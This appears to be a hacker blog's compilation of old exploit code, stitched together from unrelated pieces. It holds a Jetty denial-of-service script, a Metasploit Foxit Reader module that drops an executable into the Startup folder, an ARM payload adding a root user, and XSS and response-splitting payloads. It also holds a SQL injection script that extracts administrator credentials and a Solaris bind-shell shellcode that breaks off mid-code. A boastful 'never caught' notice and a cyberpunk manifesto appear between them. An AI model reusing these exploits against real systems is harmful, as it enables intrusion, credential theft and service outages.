======================================================================== Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit ======================================================================== <?php #################################################################################### # 7.0.0-pre5 Dispatcher Servlet DoS # # Affected Software: Jetty < 6.1.16, < 7.0.0.pre5 (all platforms) # # # Description: # The dispatcher servlet (com.acme.DispatchServlet) is prone to a DoS vulnerability. # This example servlet is meant to be used as a resources dispatcher, however a # malicious aggressor may abuse this functionality in order to cause a recursive # inclusion. In detail, it is possible to abuse the method # com.acme.DispatchServlet.doGet(DispatchServlet.java:203) forcing the application # to recursively include the "DispatchServlet". # As a result, it is possible to trigger a "java.lang.StackOverflowError" and # consequently an internal server error (500). Multiple requests may easily affect # the availability of the entire servlet container. #################################################################################### error_reporting(E_ALL&E_NOTICE); echo("\n\n :: Jetty Dispatcher Servlet DoS - http://blog.nibblesec.org ::\n"); echo(" :: Affected Software: Jetty < 6.1.16, < 7.0.0.pre5 - all platforms ::
\n\n");
if($argc==3){
$cont=0;
$reqNum=1000;
$req = "GET /dispatch/includeN/Dispatch HTTP/1.0\r\n";
$req .= "Host: ".$argv[1]."\r\n";
$req .= "\r\n";
while($cont<$reqNum){
$sock = fsockopen($argv[1],$argv[2],$errno,$errstr,30);
if(!$sock){
echo "\nNo response from ".$argv[1];
die;
}
fwrite($sock,$req);
fclose($sock);
echo(".");
$cont++;
}
echo ("\n\nCheck your servlet container, after " . $reqNum . " requests:\n" . "http://" . $argv[1] . ":" . $argv[2] . "/");
}else{
echo("\nphp " . $argv[0] . " <host> <port>\n\n");
}
Foxit_reader_filewrite.rb 11955 Z swtornio
Foxit_reader_filewrite.rb 11955Z swtornio
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Foxit PDF Reader 4.2 Javascript File Write',
'Description' => %q{
This module exploits an unsafe Javascript API implemented in Foxit PDF Reader
version 4.2. The createDataObject() Javascript API function allows for writing
arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.
Note: This exploit uses the All Users directory currently, which required
administrator privileges to write to. This means an administrative user has to
open the file to be successful. Kind of lame but thats how it goes sometimes in
the world of file write bugs.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bannedit', # metasploit module
'Chris Evans' # Initial discover and exploit
],
'Version' => '$Revision: 11955 $',
'References' =>
[
[ 'OSVDB', '71104' ],
[ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Platform' => 'win',
'Targets' =>
[
['Automatic', { 'auto' => true } ], # uses both
['Foxit PDF Reader v4.2 (Windows XP SP0-SP3)', {}],
['Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)', {}],
],
'DisclosureDate' => 'Mar 5 2011',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('DECODER', [ true, 'The decoder script.', 'vbs_b64']),
], self.class)
end
def exploit
decoder_file = rand_text_alpha(rand(6) + 1)
payload_file = rand_text_alpha(rand(6) + 1)
ext = '.b64'
exe = generate_payload_exe
payload_b64 = Rex::Text.encode_base64(exe)
decoder = build_decoder(decoder_file, payload_file)
path_old = 'c:/Documents and Settings/All Users/Start Menu/Programs/Startup/'
path_new = 'c:/Users/All Users/Start Menu/Programs/Startup/'
pdf = %Q|
%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (
createDataObject\('#{path_old + "../../../../../WINDOWS/Temp/" + payload_file + ext}', "#{payload_b64}"\);
createDataObject\('#{path_old + decoder_file + '.bat'}', unescape\(\"#{decoder}\"\)\);
createDataObject\('#{path_new + "../../../../../WINDOWS/Temp/" + payload_file + ext}', "#{payload_b64}"\);
createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\"\)\);) >> trailer<</Root 1 0 R>>|
file_create(pdf)
end
def build_decoder(decoder_file, payload_file)
file = []
decoder_bat = Msf::Config.data_directory + "/exploits/cmdstager/"
case datastore['DECODER']
when 'vbs_b64_adodb'
decoder_bat << datastore['DECODER']
when 'vbs_b64'
decoder_bat << datastore['DECODER']
else
print_status("Selected decoder is incompatible with this exploit.")
print_status("Defaulting to vbs_b64 decoder.")
decoder_bat << 'vbs_b64'
end
decoder = File.new(decoder_bat, "r").read
decoder << "cscript //nologo C:/Windows/Temp/" + decoder_file + '.vbs'
decoder.gsub!(/\"/, '\"')
decoder.gsub!(/\n/, " && ")
decoder.gsub!(/ENCODED/, "C:/Windows/Temp/" + payload_file + '.b64') # payload.b64
decoder.gsub!(/DECODED/, "C:/Windows/Temp/" + payload_file + '.exe') # payload.exe
decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs')
return decoder = Rex::Text.uri_encode(decoder)
end
end
A IMPORTENT NOTICE FROM TRINGLE 2011 TO THE VIEWERS
HELLO EVERYBODY!!!!
THIS IS ME TRINGLE2011...
IF ANY BODY LIKE MY POSTS PLZ FOLLOW ME THERE AT THE WEB PAGE..
I AM GOING TO MAKE A SHORT SURVEY ON MY BLOG...
PLZ HELP ME TO MAKE YOUR MOST POPULAR BLOGER MORE ENTHUSIASTIC
ABOUT HIS UPCOMING WORKS !!!!!!!!!!!!!!!!!!!!!!
"" DO NOT CARE / WE ARE HACKER ""
HAVE A NICE DAY >>>>>> TAKE CARE >>>>>>> NEVER CAUGHT>>>>>> BE HAPPY
LOVE YOU ALL>>>>>
YOU ALSO CAN SEND ME UR VIEWS OR SUGGESTIONS TO -- andrew.nile@gmail.com BYE .
THIS IS ME TRINGLE2011...
IF ANY BODY LIKE MY POSTS PLZ FOLLOW ME THERE AT THE WEB PAGE..
I AM GOING TO MAKE A SHORT SURVEY ON MY BLOG...
PLZ HELP ME TO MAKE YOUR MOST POPULAR BLOGER MORE ENTHUSIASTIC
ABOUT HIS UPCOMING WORKS !!!!!!!!!!!!!!!!!!!!!!
"" DO NOT CARE / WE ARE HACKER ""
HAVE A NICE DAY >>>>>> TAKE CARE >>>>>>> NEVER CAUGHT>>>>>> BE HAPPY
LOVE YOU ALL>>>>>
YOU ALSO CAN SEND ME UR VIEWS OR SUGGESTIONS TO -- andrew.nile@gmail.com BYE .
A Cyberpunk Manifesto v2.0 2003 year [English]
============================================== A Cyberpunk Manifesto v2.0 2003 year [English] ============================================== This ia a copy of Cyberpunk Manifesto v2.0 2003 year
[English] I have thought to share With u all ...Tringle2011(nick name..)
//English We are those with analog/digitalised soul. Cyberpunks.
This is to be A second manifestation. > Cyberpunk. We are the neo men. Those new species of homosapiens, that were meant
to be born at this age.The way we feel the world, includes the cyberspace
as natural. Our first breath take in this world, at the moment of our birth,
consisted the dense of electricity flow in wires, the machinery buzz surrounding
the place, the data vibrations on information high-ways on air and cable.
The way we take technology equals the way others take food, water and air.
The data-space it self is the extra element of our enviorment. But we are
that mutation, which is not only ordinary presense of technological tools. Everybody can learn and become to understand technology and new technology,
but we are those, who have got it naturaly. We are those that see reality
in a different way. Our point of view shows more than ordinary people can
see. They see only what is outside, but we see what is inside.
That's what we are - realists with the glasses of dreamers. The way we think
and look out to the enviorment, the blood that rushes trough our veins,
the air that fizzles in our brains - it is that mutation that distinguish
us from others.Being a net-head, a technological-geek, computer nerd is not
it, that's a sign. We are new; every and each area of the new being is something
we take as homely and familiar. We know history and we know it is dead
crawling for life. A Cyberpunk is just a label word, the content inside
is us - the man and women who are different, most of us are out of
understanding. You can call us crazy, mad, insane, strange, wierdos
- that is the most close word in your dictionary to cover what you
think of something never manifested before. Most of today's world is meeting a serious change. Some are sticking with
the ruins, some are moving ahead letting go of the past. Society, which
still does not want to refresh its self, have found the stability of
its existance in the old-approved ways of accepting the ordinary and known.
But we are none of them. Cyberpunks will always be refreshing. And even
those who claim that cyberpunks is dead, will be just the ones that can
not see it reborn in the new wave of discoveries. You can't say that evolution
has stopped, or can you. "Cyberpunks", we are that evolving part. The rebel, who fights for its own
survival. And we believe in our strength, because our advantage is that of
understanding new fenomenas, which are unclear to the rest, but part of our being. > Society. The society prefers to follow a leader. That leader is the one who controls it.
People who take decisions on the basis of what they have been told what is right
and wrong, are those who follow and trust blindly. Society should learn and find
out by the trail of try and fail. Society is a mass, being controlled remotely and
or localy by the system and its authorities. The society however, is settled down,
prefers to listen and obey. Society is a mainframe picture of masses who wish to have someone to follow and
not live on their own choice. Therefore the society is controlled by the
corporations and the governments in a sequence of systems and schematics of
chaos control under the big bro's trigger. Society have created what it needed to have - the bow before leadership of
government and corporative kind. Society than was filled up with hatred toward
the dangers for the System's integrity. In times people did need someone to follow, that someone found it out to be
easy to gain profit out of the controlled society and that someone begun to
control with dirty tricks, getting away with it, because being the only authority,
the controlling System was unvincible. Soceity now remains under control
and somelike enjoys it. Society denies us, because we are far more dagerous to their utopia, then
the governments are. We do not belong to those society masses. > The System The System. Centuries-old, existing on principles that hang no more today.
A System that has not changed much since the day of its birth. The system
is what controls you. That is the goverment, consisted of people who live separately from the
social masses. Governments have not changed since the birth of social living
in humen beings. On the other hand the control is with corporations and there
is a question who actualy has the control. Is it the corporations who control
the governments or they are both the same bureau. However the system is what
needs food and support to exist, that support is given by the masses of society,
which are like hypnotised when coming to trust someone to have control over the
personal life of each member of them. That support comes by, when the system shoots lies to the social mass.
Lies are the truths they want us to believe in. The System must impose
its truth upon us so that it can rule. The government needs us follow it
blindly. Not only the governemtns, but the corporations, they dictate fashion
styles, food choice and medicational prices. They both, Governments and
Corporations are what the System is. A set of rules, filled in by the media. Only a blind and deaf, would grant
control over his life to a someone whos greed for money and power is covered
by impression of Care, Support, Security and Stability. The system is afraid
of chaos, but chaos is just the way they call the possibility of free choice.
Where decentralised - people would be able to do better trough. > The media. Television, radio and press is no longer the only source of information for the
seeking man or for the sleeping one. The Internet is the new mediaspace,
a space where information can be spread freely and therefore no one is living
in informational eclipse now. Even where governments and bussineses are trying
to set restrictions and control over data flow - there are ways to gather that
information, which can 'englight'. And Information still remains power. We are whitnessing the actual growth of
our race. No longer informational barriers block the real potential sight and
now people can demand more rights. Scientists are making discoveries, which
when made public can no longer be so easily blocked for comercial or govermental
use. Sad is when people stomped down are willingless to demand what is granted
to them. Now the media can awaken people, transform societies. The media however
have proven to be false or missleading, which confuses in truth filtering, that
just rises Information's price. > Where are we? We are those whose DNA is starting to form a new sight and sense - that which
will allow the future generations to comprehend with cyberspace, the data-space.
No heavy or implanted hardware devices will be able to fully replace what the
nature is giving us. Mutations are taking place. The evolution granted us with a better set of
tools to interact with the enviormental changes. That is why we are cyberpunks,
neo humen, electronic minds. We know that the Cyberspace is a mirror world,
an enhancement, which hosts all past and present creations of man. The cyberspace is that invisible world where, humen mind and thought merge
with matery and takes form visible to the senses, trough machines. The
cyberspace seems like it always have existed there, here, everywhere - but
only now we are making connections and discovering it - we are begining to change. Cyberpunks - we are those who live in cyberspace and using the curent technology
is only the vessel to bring us on the other side. We are the altered new race. Cyberpunks. This is to be A second manifestation.
Linux/ARM (Meta) Create a New User with UID 0
=============================================
linux/ARM (Meta) Create a New User with UID 0
============================================= Exploit Title: Linux/ARM - Create a new user with UID 0 (MSF)
Tested on: ARM926EJ-S rev 5 (v5l)
Issue link: https://metasploit.com/redmine/issues/3254 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' ### # # AddUser # ------- # # Adds a UID 0 user to /etc/passwd. # ### module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})super(merge_info(info,
'Name' => 'Linux Add User',
'Version' => '???',
'Description' => 'Create a new user with UID 0',
'Author' => [ 'Jonathan Salwan' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true))
# Register adduser options
register_options(
[
OptString.new('USER', [ true, "The username to create","metasploit"]), OptString.new('PASS', [ true, "The password for this user","metasploit"]), OptString.new('SHELL', [ false, "The shell for this user","/bin/sh"]), ], self.class)
end
#
# Dynamically builds the adduser payload based on the user's options.
#
def generate_stage
user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || 'metasploit'
shell = datastore['SHELL'] || '/bin/sh'
str = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}\n"
strl1 = [ (str.length)+52 ].pack('C*')
strl2 = [ str.length ].pack('C*')
pwdir = "/etc/passwd"
payload =
"\x05\x50\x45\xe0\x01\x50\x8f\xe2\x15\xff\x2f\xe1" +
"\x78\x46"+ strl1 + "\x30\xff\x21\xff\x31\xff\x31" +
"\xff\x31\x45\x31\xdc\x22\xc8\x32\x05\x27\x01\xdf" +
"\x80\x46\x41\x46\x08\x1c\x79\x46\x18\x31\xc0\x46" +
strl2 + "\x22\x04\x27\x01\xdf\x41\x46\x08\x1c\x06" +
"\x27\x01\xdf\x1a\x49\x08\x1c\x01\x27\x01\xdf" +
str + pwdir
end
end
Wednesday, April 20, 2011
Exploit Classification / Shellcode (computer security)
======================================================
Exploit Classification / Shellcode (computer security)
======================================================
[0x01] - EXPLOIT An exploit (from the same word in the French language, meaning "achievement", or "accomplishment") is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerised). This frequently includes such things as gaining control of a computer system or allowing privilege escalation or a denial of service attack. ----------------------- [=>] Classification ----------------------- There are several methods of classifying exploits. The most common is by how the exploit contacts the vulnerable software. A 'remote exploit' works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A 'local exploit' requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usually consisting of modified servers that send an exploit if accessed with client application. Exploits against client applications may also require some interaction with the user and thus may be used in combination with social engineering method. Another classification is by the action against vulnerable system: unauthorized data access, arbitrary code execution, denial of service. Many exploits are designed to provide superuser-level access to a computer system. However, it is also possible to use several exploits, first to gain low-level access, then to escalate privileges repeatedly until one reaches root. Normally a single exploit can only take advantage of a specific software vulnerability. Often, when an exploit is published, the vulnerability is fixed through a patch and the exploit becomes obsolete for newer versions of the software. This is the reason why some blackhat hackers do not publish their exploits but keep them private to themselves or other crackers. Such exploits are referred to as 'zero day exploits' and to obtain access to such exploits is the primary desire of unskilled attackers, often nicknamed script kiddies. ----------------------- [=>] Types of exploit ----------------------- Exploits are commonly categorized and named by these criteria: * The type of vulnerability they exploit. * Whether they need to be run on the same machine as the program that has the vulnerability (local) or can be run on one machine to attack a program running on another machine (remote). * The result of running the exploit (EoP, DoS, Spoofing, etc...) [0x02] - SHELLCODE In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. ----------------------- [=>] Types of shellcode ----------------------- Shellcode can either be "local" or "remote", depending on whether it gives an attacker control over the same machine as it runs on (local) or over another machine through a network (remote). In some situations when it is hard to inject and execute a shellcode with the desired functionality directly, "staged" shellcode may be used. ----------------------- [=>] Local shellcode ----------------------- A local shellcode is used by an attacker who has limited access to a machine but can exploit a vulnerability in a process on that machine that has higher privileges. If successfully executed, the shellcode will provide the attacker access to the machine with the same higher privileges as the targeted process. Local shellcode is relatively easy to create; often the only thing it does is execute a shell executable. ----------------------- [=>] Remote shellcode ----------------------- A remote shellcode is used when an attacker wants to target a vulnerable process running on another machine on the local network or internet. If successfully executed, the shellcode can provide the attacker access to the target machine across the network. Remote shellcodes normally use standard TCP/IP socket connections to allow the attacker access to the shell on the target machine. Such shellcode can be sub-divided based on how this connection is set up: if the shellcode can establish this connection, it is called connect-back shellcode because the shellcode connects back to the attacker's machine. On the other hand, if the attacker needs to create the connection, the shellcode is called a bindshell because the shellcode binds to a certain port on which the attacker can connect to control it. A third, much less common type is socket-reuse shellcode. This type of shellcode is sometimes used when an exploit establishes a connection to the vulnerable process that is not closed before the shellcode is run. The shellcode can then re-use this connection to communicate with the attacker. Socket re-using shellcode is harder to create because the shellcode needs to find out which connection to re-use and the machine may have many connections open. A firewall can be used to detect the outgoing connections made by connect-back shellcodes and the attempt to accept incoming connections made by bindshells. They can therefore offer some protection against an attacker, even if the system is vulnerable, by preventing the attacker from gaining access to the shell created by the shellcode. This is one reason why socket re-using shellcode is sometimes used: because it does not create new connections and therefore is harder to detect and block. ----------------------------------- [=>] Download and execute shellcode ----------------------------------- This is a type of remote shellcode that downloads and executes some form of malware on the target system. This type of shellcode does not spawn a shell, but rather instructs the machine to download a certain executable file off the network, save it to disk and execute it. Nowadays, it is commonly used in drive-by download attacks, where a victim visits a malicious webpage that in turn attempts to run such a download and execute shellcode in order to install software on the victim's machine. A variation of this type of shellcode downloads and loads a library. Benefits of this technique are that the code can be smaller, that it does not require the shellcode to spawn a new process on the target system and that the shellcode does not need code to "clean up" the targetted process (this can be done by the library loaded into the process. --------------------- [=>] Staged shellcode --------------------- When the amount of data that an attacker can inject into the target process is too limited to execute useful shellcode directly, it may be possible to execute it in stages. First, a small piece of shellcode (stage 1) is executed. This code then downloads a larger piece of shellcode (stage 2) into the process' memory and executes it. ----------------------- [=>] Egg-hunt shellcode ----------------------- Another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process, but cannot determine where in the process it will end up. A small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process' address space for the larger shellcode (the egg) and executes it. --------------------- [=>] Omelet shellcode --------------------- This type of shellcode is similar to egg-hunt shellcode, but looks for multiple small blocks of data (eggs) and recombines them into one larger block (the omelet) that is subsequently executed. This is used when an attacker can only inject a number of small blocks of data into the process. --------------------------------- [=>] Shellcode execution strategy --------------------------------- An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits. Shellcode encoding Because most processes filter or restrict the data that can be injected, shellcode often need to be written to allow for these restrictions, this includes making the code small, null-free or alphanumeric. Various solutions have been found to get around such restrictions, including: * Design and implementation optimizations to decrease the size of the shellcode. * Implementation modifications to get around limitations in the range of bytes used in the shellcode. * Self-modifying code that modifies a number of the bytes of its own code before executing them to re-create bytes that are normally impossible to inject into the process. Since intrusion detection can detect signatures of simple shellcodes being sent over the network, it is often encoded, made self-decrypting or polymorphic to avoid detection. Percentage encoding Exploits that target browsers commonly encode shellcode in a JavaScript string using Percent-encoding, "\uXXXX"-encoding or entity encoding. Some exploits also obfuscate the encoded shellcode string further to prevent detection by IDS. For example, on the IA-32 architecture, here's how two NOP instructions would look, first unencoded: 90 NOP 90 NOP Then encoded into a string using percent-encoding (using the unescape() function to decode): unescape("%u9090"); Next encoded into a string using "\uXXXX"-encoding: "\u9090"; And finally encoded into a string using entity encoding: "邐" or "邐" ------------------------ [=>] Null free shellcode ------------------------ Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When a null-terminated string is copied, it will be copied up to and including the first null but subsequent bytes of the shellcode will not be processed. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it very unlikely to run successfully. To produce null free shellcode from shellcode that contains null bytes one can substitute machine instructions that contain zeroes with instructions that have the same effect but are free of nulls. For example, on the IA-32 architecture one could replace this instruction: B8 01000000 MOV EAX,1 // Set the register EAX to 0x000000001 which contains zeroes as part of the literal (1 expands to 0x00000001) with these instructions: 33C0 XOR EAX,EAX // Set the register EAX to 0x000000000 40 INC EAX // Increase EAX to 0x00000001 which have the same effect but take fewer bytes to encode and are free of nulls. ----------------------------------------- [=>] Alphanumeric and printable shellcode ----------------------------------------- In certain circumstances, a target process will filter any byte from the injected shellcode that is not a printable or alphanumeric character. Under such circumstances, the range of instructions that can be used to write a shellcode becomes very limited. A solution to this problem was published by Rix in Phrack 57[6] in which he showed it was possible to turn any code into alphanumeric code. A technique often used is to create self-modifying code, because this allows the code to modify its own bytes to include bytes outside of the normally allowed range, thereby expanding the range of instructions it can use. Using this trick, a self-modifying decoder can be created that uses only bytes in the allowed range. The main code of the shellcode is encoded, also only using bytes in the allowed range. When the output shellcode is run, the decoder can modify its own code to be able to use any instruction it requires to function properly and then continues to decode the original shellcode. After decoding the shellcode the decoder transfers control to it, so it can be executed as normal. It has been shown that it is possible to create shellcode that looks like normal text in English. ---------------------------- [=>] Unicode proof shellcode ---------------------------- Modern programs use Unicode strings to allow internationalization of text. Often, these programs will convert incoming ASCII strings to Unicode before processing them. Unicode strings encoded in UTF-16 use two bytes to encode each character (or four bytes for some special characters). When an ASCII string is transformed into UTF-16, a zero byte is inserted after each byte in the original string. Obscou proved in Phrack 61 that it is possible to write shellcode that can run successfully after this transformation. Programs that can automatically encode any shellcode into alphanumeric UTF-16-proof shellcode exist, based on the same principle of a small self-modifying decoder that decodes the original shellcode. -------------- [=>] Platforms -------------- Most shellcode is written in machine code because of the low level at which the vulnerability being exploited gives an attacker access to the process. Shellcode is therefore often created to target one specific combination of processor, operating system and service pack, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors. Such versatility is commonly achieved by creating multiple versions of the shellcode that target the various platforms and creating a header that branches to the correct version for the platform the code is running on. When executed, the code behaves differently for different platforms and executes the right part of the shellcode for the platform it is running on.
McAfee Network Security Manager <= 5.1.11.8.1 Multiple Cross Site Scripting Vulnerabilities
===========================================================================
McAfee Network Security Manager <= 5.1.11.8.1 Multiple Cross Site Scripting Vulnerabilities
===========================================================================Attackers can exploit these issues by enticing an unsuspecting victim
into following a malicious URI. The following example URIs are available: https://www.example.com/intruvert/jsp/module/Login.
jsp?password=&Login%2bID=&node=&iaction=precreatefcb14">
<script>alert('XSS')</script>8b3283a1e57
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)
</script>2aa99b60533&iaction=precreatefcb14"><script>alert(???XSS???)
</script>8b3283a1e57
Oracle Sun Java System Web Server - HTTP Response Splitting
===========================================================
Oracle Sun Java System Web Server - HTTP Response Splitting
===========================================================
Description
Security-Assessment.com discovered that is possible to successfully perform an HTTP Response Splitting attack against applications served by Sun Java
System Web Server. The vulnerability can be exploited if user supplied input is
used to generate the value of an HTTP header, as shown in the test.jsp page below:
test.jsp – Source Code
<html>
test
<%
response.setStatus(HttpServletResponse.SC_OK);
String ref = request.getParameter("ref");
response.setHeader("Referer",ref);
%>
The test.jsp page is vulnerable to HTTP response splitting when served by Sun Java System Web Server. HTTP Response Split can lead to Cross Site Scripting and
browser cache poisoning attacks. Exploitation In this advisory, we will cover description of a Cross Site Scripting attack.
The following HTTP GET contains a Cross Site Scripting payload which is included
in the HTTP Header injection: GET /test.jsp?ref=http://my.test.domain.com/%0D%0AContent- type:+text/html;%0D%0A%0D%0ATEST%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 By inserting CR and LF characters in the “ref” HTTP parameter, it is possible
to split the HTTP response from the server as shown in the following table: HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Fri, 28 May 2010 12:44:55 GMT Referer: http://my.test.domain.com/ Content-type: text/html; TEST<script>alert(1)</script> Content-type: text/html;charset=ISO-8859-1 Content-length: 22 <html> test The above example shows a JavaScript code injection in the split
HTTP response. Consequently,
it is possible to perform a Cross Site Scripting attack. The testing was
conducted using the following settings: * Server side: Sun-Java-System-Web-Server/7.0 Update 8 (default) installed
on Windows XP SP3; * Client side: Mozilla Firefox 3.5.8, Opera 10.10, Internet Explorer 8. Solution Oracle has created a fix for this vulnerability which has been included as part
of Critical Patch Update Advisory - October 2010. Security-Assessment.com
recommends all users of Sun Java System Web Server to upgrade to the latest version
as soon as possible.
For more information on the new release of patch for Sun Java
System Web Server refer to the release notes:
http://sunsolve.sun.com/search/document.do?assetkey=1-79-1215353.1-1
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html#AppendixSUNS
A-Blog v2.0 (sources/search.php) SQL Injection Exploit
====================================================== A-Blog v2.0 (sources/search.php) SQL Injection Exploit ====================================================== #!/usr/bin/python # # Exploit Title: A-Blog v2.0 (sources/search.php) SQL Injection Exploit # Software Link: http://sourceforge.net/projects/a-blog/ # Version : 2.0 # Tested on : EasyPHP 5.3.1.0 for Windows with Python 3.1 # # # Description # =========== # # + sources/search.php => This few lines of code strip whitespaces from the # beginning and end of the 'words' GET parameter. Then, # all the whitespaces are replaced with %. # # 12: if ((array_key_exists('words', $_GET)) && ($_GET['words'] == '')) { # 13: callback_js("page=results&words=$searchwords"); # 14: } # 15: # 16: else{ # 17: if ((array_key_exists('words', $_GET))) { # 18: $words2 = trim($_GET['words']); # 19: } # 20: $search = str_replace(" ", "%", "$words2"); # 21: } # # # + sources/search.php => The string returned from the previous code is used in # the query below without being sanitized. # # 33: $sql = "SELECT * FROM site_news WHERE title LIKE '%$search%' OR home_text # LIKE '%$search%' OR extended_text LIKE '%$search%'"; # 34: $sql_result = mysql_query($sql,$connection) or die ("Couldnt execute query"); # # # + sources/search.php => Then, the results are echoed # # 39: while($row = mysql_fetch_array($sql_result)){ # 40: # 41: $id = $row['nid']; # 42: $title = $row['title']; # 43: $home = $row['home_text']; # 44: $extended = $row['extended_text']; # 45: # 46: echo "<li><a href='blog.php?view=news&id=$id' title='Read $title'>$title</a></li>"; # 47: } # import re import sys import textwrap import http.client def usage(program): print('Usage : ' + program + ' <victim hostname> <path>\n') print('Example: ' + program + ' localhost /A-BlogV2/') print(' ' + program + ' www.victim.com /complete/path/') return def removeDuplicates(mylist): d = {} for elem in mylist: d[elem] = 1 return list(d.keys()) def exploit(target, path): payload = 'search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2C' payload += 'CONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2' payload += '%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/' payload += 'site_administrators/%2A%2A/%23' print('[+] Sending HTTP request\n') print(textwrap.fill('GET ' + path + payload) + '\n') con = http.client.HTTPConnection(target) con.request('GET', path + payload) res = con.getresponse() if res.status != 200: print('[!] HTTP GET request failed') exit(1) print('[+] Parsing HTTP response') data = res.read().decode() pattern = re.compile(r"<1>([\w:]+?)<2>", re.M) credentials = removeDuplicates(pattern.findall(data)) if len(credentials) > 0: print('[+] Credentials found\n') for element in credentials: print(element) else: print('[!] Credentials not found') return print('\n+---------------------------------------------------------------------------+') print('| A-Blog v2.0 (sources/search.php) SQL Injection Exploit by Ptrace Security |') print('+---------------------------------------------------------------------------+\n') if len(sys.argv) != 3: usage(sys.argv[0]) else: exploit(sys.argv[1], sys.argv[2]) exit(0)
solaris/SPARC portbind port 6789 228 bytes
==========================================
solaris/SPARC portbind port 6789 228 bytes ========================================== /* * Solaris shellcode - connects /bin/sh to a port * */ #include <string.h> /********************************************************************** void main(void) { __asm__(" ! Server address xor %l1, %l1, %l1 ! l1 = 0 st %l1, [%sp - 12] ! 0 <=> INADDR_ANY mov 0x2, %l1 ! AF_INET sth %l1, [%sp -16] ! Server family mov 0x30, %l1 ! High order byte of Port sll %l1, 0x8, %l1 ! << or 0x39, %l1, %l1 ! Low order byte of port sth %l1, [%sp - 14] ! Server port ! Address length mov 0x10, %l1 ! 16, sizeof(struct sockaddr_in); st %l1, [%sp -36] ! Length of address ! Create socket mov 0x2, %o0 ! o0 = AF_INET mov 0x2, %o1 ! o1 = SOCK_STREAM xor %o2, %o2, %o2 ! o2 = 0 mov 0xe6, %g1 ! g1 = 230 = SYS_so_socket ta 8 ! socket(AF_INET, SOCK_STREAM, 0); add %o0, 0x1, %l0 ! l0 = server_fd +1 ! Bind address to socket sub %sp, 16, %o1 ! o1 = &server mov 0x10, %o2 ! o2 = 16 = sizeof(struct sockaddr_in); mov 232, %g1 ! g1 = 232 = SYS_bind ta 8 ! Listen sub %l0, 0x1, %o0 ! o0 = server_fd xor %o1, %o1, %o1 ! backlog = 0 mov 233, %g1 ! g1 = 233 = SYS_listen ta 8 ! Accept sub %l0, 0x1, %o0 ! o0 = server_fd sub %sp, 32, %o1 ! o1 = &client sub %sp, 36, %o2 ! o2 = &addrlen mov 234, %g1 ! g1 = 234 = SYS_accept ta 8 add %o0, 0x1, %l0 ! l0 = client_fd ! Set up IO sub %l0, 0x1, %o0 ! o0 = client_fd mov 0x9, %o1 ! o1 = F_DUP2FD xor %o2, %o2, %o2 ! o2 = 0 = STDIN_FILENO mov 0x3e, %g1 ! g1 = 62 = SYS_fcntl ta 8 ! fcntl(client_fd, F_DUP2FD, STDIN_FILENO); sub %l0, 0x1, %o0 ! o0 = client_fd mov 0x1, %o2 ! o2 = 1 = STDOUT_FILENO ta 8 ! fcntl(client_fd, F_DUP2FD, STDOUT_FILENO); sub %l0, 0x1, %o0 ! o0 = client_fd mov 0x2, %o2 ! o2 = 1 = STDERR_FILENO ta 8 ! fcntl(client_fd, F_DUP2FD, STDERR_FILENO); ! Execve /bin/sh xor %o2, %o2, %o2 ! o2 = 0 => envp = NULL set 0x2f62696e, %l0 ! lo = '/bin' set 0x2f2f7368, %l1 ! 